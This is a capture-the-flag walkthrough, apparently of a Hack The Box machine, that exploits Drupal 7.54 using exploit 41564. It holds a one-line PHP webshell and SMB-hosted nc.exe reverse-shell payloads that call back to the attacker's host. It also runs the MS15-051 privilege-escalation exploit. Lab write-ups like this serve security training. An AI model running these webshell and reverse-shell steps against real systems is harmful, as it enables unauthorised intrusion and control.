nmap -p- --min-rate 10000 10.10.10.9 -Pn
I see that ports (80,135) are open, let's do greater nmap scan for them.
nmap -A -sC -sV -p80,135 10.10.10.9 -Pn
I see that port 80 is 'Drupal' website and version of this is 'Drupal 7.54'.
Let's check publicly known exploit for this version of 'Drupal'
Let's try to use it.
searchsploit -m 41564Again, I changed some stuff from this script as below.
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dr4ks.php',
'data' => '<?php system($_REQUEST["cmd"]); ?>'
];After this, I just run php file via php 41564.php on Terminal.
Now, we can browse our webshell dr4ks.php on our target to run Windows OS commands.
Now, it's time to add reverse shell.
First, I open my SMB share on attacker machine via below command.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share nc
Then, I browse below payload into my webshell
\\10.10.14.9\share\nc.exe%20-e%20cmd.exe%2010.10.14.9%201337I got shell from my listener (1337).
nc -nlvp 1337
user.txt
For privesc, I run systeminfo command.
I found MS15-051 vulnerability for our target machine.
Let's download this vulnerability's executable.
And run SMB share.
Then, run command on windows shell.
\\10.10.14.9\share\ms15-051x64.exe "\\10.10.14.9\share\nc.exe -e cmd.exe 10.10.14.9 1338"
I run also listener to get reverse shell.
root.txt
